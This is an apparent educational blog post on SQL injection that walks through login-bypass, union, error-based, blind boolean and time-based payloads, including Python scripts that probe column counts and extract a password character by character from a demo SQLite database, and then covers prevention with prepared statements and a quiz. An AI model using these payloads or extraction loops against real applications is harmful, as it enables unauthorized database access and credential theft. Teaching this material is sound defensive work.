Cyber Threats Series, Part 3: SQL Injection
- Published on
- Author: Wisit Longsida (@__ART3MISS)

Welcome to Part 3 of the Cyber Threats Series, where we'll learn about SQL Injection attacks, how they work, and ways to stop them.
SQL Injection (SQLi) is a technique attackers use to read or change a database by supplying input that the application pastes into its own SQL queries, so the input is executed as SQL. Let's break this down step by step to make it easy to understand.
What Is SQL?
SQL (Structured Query Language) is the language used to query and manage data in relational databases. Think of a database as a collection of tables like this:

| orders | items |
|---|---|
| order_number (PK) | item_id (PK) |
| item_id (FK) | price |
| cost | description |

Each column above lists one table's fields: `orders.item_id` is a foreign key (FK) that points at the primary key (PK) of `items`. Applications retrieve and manage this data through statements like:
- `SELECT`: retrieve data
- `INSERT`: add new data
- `UPDATE`: modify existing data
What Is SQL Injection?
SQL Injection (SQLi) is an attack in which user-supplied input is placed into a SQL statement without being separated from the query's own code, so the attacker's input is parsed as SQL and changes what the database does.
Example:
A website login form may build this query by pasting the submitted values straight into the string:
```sql
SELECT * FROM Users WHERE username = 'input_username' AND password = 'input_password';
```
If an attacker enters the following as the username:
```
' OR '1'='1'-- -
```
the query becomes:
```sql
SELECT * FROM Users WHERE username = '' OR '1'='1'-- -' AND password = 'input_password';
```
The first quote closes the string, `OR '1'='1'` makes the WHERE clause true for every row, and `-- -` turns the rest of the line, including the password check, into a comment. The query returns every user, and a login routine that only checks "at least one row came back" signs the attacker in as whichever row comes first.
One detail that trips people up: `' OR '1'='1` without the comment does not work in the username field, because `AND` binds tighter than `OR`, so the password check still applies (`username = '' OR ('1'='1' AND password = '...')`). The same payload does work in the password field, where it lands as the last condition in the clause.
Types of SQL Injection Attacks
1. Union-Based Injection
Attackers use the UNION keyword to append the rows of a second SELECT, usually from a different table, to the rows of the original query. The injected SELECT must return the same number of columns (with compatible types) as the original one, which attackers discover by trial: `' UNION SELECT NULL-- -`, then `' UNION SELECT NULL, NULL-- -`, and so on until the database stops returning a column-count error.
Example: a product search that runs `SELECT product_name, price FROM products WHERE product_name = '<input>'` receives the input `soap' UNION SELECT username, password FROM Users-- -`, so the query becomes:
```sql
SELECT product_name, price FROM products WHERE product_name = 'soap' UNION SELECT username, password FROM Users-- -';
```
The usernames and passwords now come back in the same result set as the products, and the page displays them wherever it would have shown a product name and price.
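As an added, runnable illustration of the column-count point above (example code written for this edit, not from the original post; the `products` and `Users` tables and their rows are constructed sample data), the following Python script builds the vulnerable search against an in-memory SQLite database, probes the column count with `UNION SELECT NULL, ...`, and then pulls the `Users` table out through the search results:

```python
import sqlite3

# Constructed sample data for the demo (not from the original post).
PRODUCTS = [("soap", 1.50), ("towel", 4.00)]
USERS = [("alice", "s3cret"), ("admin", "hunter2")]


def make_db() -> sqlite3.Connection:
    """In-memory database with a products table and a Users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (product_name TEXT, price REAL)")
    conn.execute("CREATE TABLE Users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)", PRODUCTS)
    conn.executemany("INSERT INTO Users VALUES (?, ?)", USERS)
    return conn


def search_products(conn: sqlite3.Connection, name: str) -> list:
    """Vulnerable search: the user-supplied name is pasted into the SQL text."""
    sql = ("SELECT product_name, price FROM products "
           "WHERE product_name = '" + name + "'")
    return conn.execute(sql).fetchall()


def find_column_count(conn: sqlite3.Connection, max_cols: int = 8) -> int:
    """Attacker's probe: try UNION SELECT NULL, NULL, ... until the database
    stops complaining that the two SELECTs have different column counts."""
    for n in range(1, max_cols + 1):
        nulls = ", ".join(["NULL"] * n)
        try:
            search_products(conn, f"x' UNION SELECT {nulls}-- -")
            return n  # no error: this many columns matches the original query
        except sqlite3.OperationalError:
            continue  # column-count mismatch, try one more
    raise RuntimeError("column count not found")


def dump_users(conn: sqlite3.Connection) -> set:
    """Use the discovered column count (2) to append the Users table."""
    payload = "soap' UNION SELECT username, password FROM Users-- -"
    return set(search_products(conn, payload))


if __name__ == "__main__":
    db = make_db()
    print("columns in original query:", find_column_count(db))
    for row in sorted(dump_users(db), key=str):
        print(row)
```

`NULL` is used for probing because it is compatible with any column type; once the count is known the attacker swaps in real columns. SQLite is lax about types, but MySQL or PostgreSQL will also reject a UNION whose column types do not line up, which is the next thing an attacker probes for.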
2. Error-Based Injection
Attackers make the database raise an error whose message contains data from the query, and rely on the application showing that raw message to the user.
Example (MySQL):
```sql
asdf' UNION SELECT 1, exp(~(SELECT password FROM users WHERE id=1))-- -
```
`exp(~(...))` overflows MySQL's DOUBLE range, and the resulting "DOUBLE value is out of range" error echoes the expression it failed on, including the value the subquery returned, so the password appears in the error text. This payload is MySQL-specific (it depends on that exact error behaviour) and only works when the application leaks database errors to the client; returning a generic error page removes the channel even if the injection itself remains.
3. Boolean-Based (Blind) Injection
Here the application returns no data from the injected query, only a difference in behaviour (a row found vs. not found, a 200 vs. a 404). The attacker appends a condition to a lookup known to succeed and watches whether the result changes.
Example: the input `1' AND '1'='2` turns `SELECT username FROM users WHERE id = '<input>'` into
```sql
SELECT username FROM users WHERE id = '1' AND '1'='2';
```
The condition is false, so no row comes back. Replace `'1'='2'` with a question about the data, such as `substr((SELECT password FROM users WHERE id=1), 1, 1) = 'a'`, and each true/false answer reveals one character. Repeated over every position, this recovers whole values without the database ever printing them, at the cost of many near-identical requests, which is also what makes it visible in logs.
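The character-by-character extraction sketched above, as an added Python example against an in-memory SQLite database (this is example code for this edit, not code from the original post; the `users` rows are constructed sample data, and `user_exists` stands in for a page that reveals only whether a lookup matched):

```python
import sqlite3
import string

# Constructed sample data for the demo (not from the original post).
USERS = [(1, "alice", "s3cret"), (2, "admin", "hunter2")]

# Every id string the vulnerable endpoint received, so the cost of the
# attack (and what a defender would see in the access log) can be counted.
REQUESTS = []


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn


def user_exists(conn: sqlite3.Connection, user_id: str) -> bool:
    """Vulnerable endpoint: concatenates the id into the query and reveals
    only whether a row matched (think 'profile found' vs. 404)."""
    REQUESTS.append(user_id)
    sql = "SELECT username FROM users WHERE id = '" + user_id + "'"
    return conn.execute(sql).fetchone() is not None


def ask(conn: sqlite3.Connection, condition: str) -> bool:
    """Blind oracle: id 1 is known to exist, so the page answers True exactly
    when the attacker's appended condition is true."""
    return user_exists(conn, "1' AND (" + condition + ")-- -")


def extract_password(conn: sqlite3.Connection, username: str) -> str:
    """Recover users.password for `username` one character at a time."""
    secret = f"(SELECT password FROM users WHERE username = '{username}')"
    # Step 1: find the length (one yes/no question per candidate length).
    length = next(n for n in range(1, 65) if ask(conn, f"length({secret}) = {n}"))
    # Step 2: for each position, test candidate characters until one matches.
    # The single quote is skipped because it would break the payload's quoting.
    charset = [c for c in string.printable.strip() if c != "'"]
    recovered = ""
    for pos in range(1, length + 1):
        for ch in charset:
            if ask(conn, f"substr({secret}, {pos}, 1) = '{ch}'"):
                recovered += ch
                break
    return recovered


if __name__ == "__main__":
    db = make_db()
    pw = extract_password(db, "admin")
    print(f"recovered password: {pw!r} using {len(REQUESTS)} requests")
```

The linear scan over the character set is the simplest form; real tooling halves the request count each step with a comparison such as `unicode(substr(...)) > 64`. The request counter is the defensive takeaway: one user extracting a seven-character value generates hundreds of hits on the same endpoint with nearly identical, quote-bearing parameters.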
4. Time-Based Injection
When not even a true/false difference is visible in the response, attackers make the database pause with a function like MySQL's `SLEEP()` and measure how long the reply takes.
Example (MySQL):
```sql
' OR IF(password='admin123', SLEEP(5), NULL)-- -
```
If the response takes about 5 seconds longer than normal, the condition was true, so a row with that password exists. The same idea uses `pg_sleep(5)` on PostgreSQL and `WAITFOR DELAY '0:0:5'` on Microsoft SQL Server, and in practice it is combined with the character-by-character questions of boolean-based injection, just with delay instead of page content as the signal.
5. Out-of-Band Injection
Rarer and more complex: when the attacker can see neither data, errors nor timing, the injected SQL makes the database server itself contact an attacker-controlled host, for example through a DNS lookup or an HTTP request, with the stolen data smuggled into the hostname or URL. It depends on database features that can reach the network and on the database host being allowed to make outbound connections, which is one reason to egress-filter database servers.
How to Prevent SQL Injections
1. Input Sanitization
- Remove or escape characters that have meaning in SQL, such as `'`, `;` and `--`.
- Example: escape `'` by doubling it (`''`, the standard SQL form) or, on MySQL, as `\'`, so the database reads it as a literal quote rather than the end of the string.
Limitations: this is a blacklist, and it fails wherever the input is used without quotes (a numeric `id` needs no `'` to inject `1 OR 1=1`), wherever a different encoding slips past the filter, and when data stored safely once is later concatenated into another query (second-order injection). If a single code path forgets to sanitize, the system is still vulnerable, so treat sanitization as defense in depth rather than the primary control.
2. Use Prepared Statements
Prepared statements keep the SQL text and the user input apart: the query is sent to the database with placeholders, and the values are sent separately, so the database never parses them as SQL. This removes injection from every place a value is bound; only the parts of a query that cannot be parameters (table or column names, `ORDER BY` targets) still need an allowlist in application code.
Example:
In PHP (mysqli):
```php
// "?" marks where the value goes; the query text itself never changes.
$stmt = $conn->prepare("SELECT * FROM Users WHERE username = ?");
// "s" declares the parameter as a string; $username is sent as data, not SQL.
$stmt->bind_param("s", $username);
$stmt->execute();
```
This ensures any user input is treated as data, not SQL code.
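To show the login bypass from the start of the post and the prepared-statement fix side by side in one runnable piece, here is an added Python/sqlite3 example (written for this edit, not code from the original post; the `Users` rows are constructed sample data, and `?` placeholders play the role of the PHP `prepare`/`bind_param` pair):

```python
import sqlite3

# Constructed sample accounts for the demo (not from the original post).
USERS = [("alice", "s3cret"), ("admin", "hunter2")]


def make_db() -> sqlite3.Connection:
    """In-memory Users table shaped like the one in the post's login example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)", USERS)
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Builds the query by string concatenation: whatever the user types
    becomes part of the SQL. Returns the matched username or None."""
    sql = ("SELECT username FROM Users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, username: str, password: str):
    """Same query with '?' placeholders: the values go to the driver
    separately from the SQL text and can never be parsed as SQL."""
    sql = "SELECT username FROM Users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def demo() -> dict:
    """Run the same inputs through both versions and collect the outcomes."""
    conn = make_db()
    bypass_user = "' OR '1'='1'-- -"   # closes the string, comments out the rest
    bypass_pass = "' OR '1'='1"        # works because it is the LAST condition
    return {
        "valid creds, vulnerable": login_vulnerable(conn, "alice", "s3cret"),
        "valid creds, safe": login_safe(conn, "alice", "s3cret"),
        "bypass via username, vulnerable": login_vulnerable(conn, bypass_user, "anything"),
        "bypass via password, vulnerable": login_vulnerable(conn, "nobody", bypass_pass),
        # Without the comment, AND binds tighter than OR, so the password check survives.
        "no comment, wrong password, vulnerable": login_vulnerable(conn, "' OR '1'='1", "wrong"),
        "bypass via username, safe": login_safe(conn, bypass_user, "anything"),
        "bypass via password, safe": login_safe(conn, "nobody", bypass_pass),
    }


if __name__ == "__main__":
    for case, result in demo().items():
        print(f"{case:45s} -> {result!r}")
```

The two `login_safe` bypass attempts return `None` because the database compares the username column against the literal string `' OR '1'='1'-- -`, which no account has. Comparing plaintext passwords inside the query is only for the demo; a real login fetches the stored hash by username and verifies it in application code.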
Quiz Time!
Q1: What type of SQL injection delays responses to confirm conditions?
A) Error-Based Injection
B) Boolean-Based Injection
C) Time-Based Injection
D) Out-of-Band Injection
Answer: C) Time-Based Injection
Q2: Which is an example of input sanitization?
A) Removing dangerous characters like `'`, `;` and `--`
B) Using prepared statements
C) Cleaning sensitive user data
D) Blocking SQL commands with firewalls
Answer: A) Removing dangerous characters like `'`, `;` and `--`
Conclusion
SQL Injection is powerful and dangerous, but it is preventable with the right techniques. By understanding how attackers exploit queries built from user input, using prepared statements everywhere a value enters a query, and keeping sanitization as a second layer, you can keep your systems secure.
Stay tuned for Part 4, where we'll uncover more about cyber threats!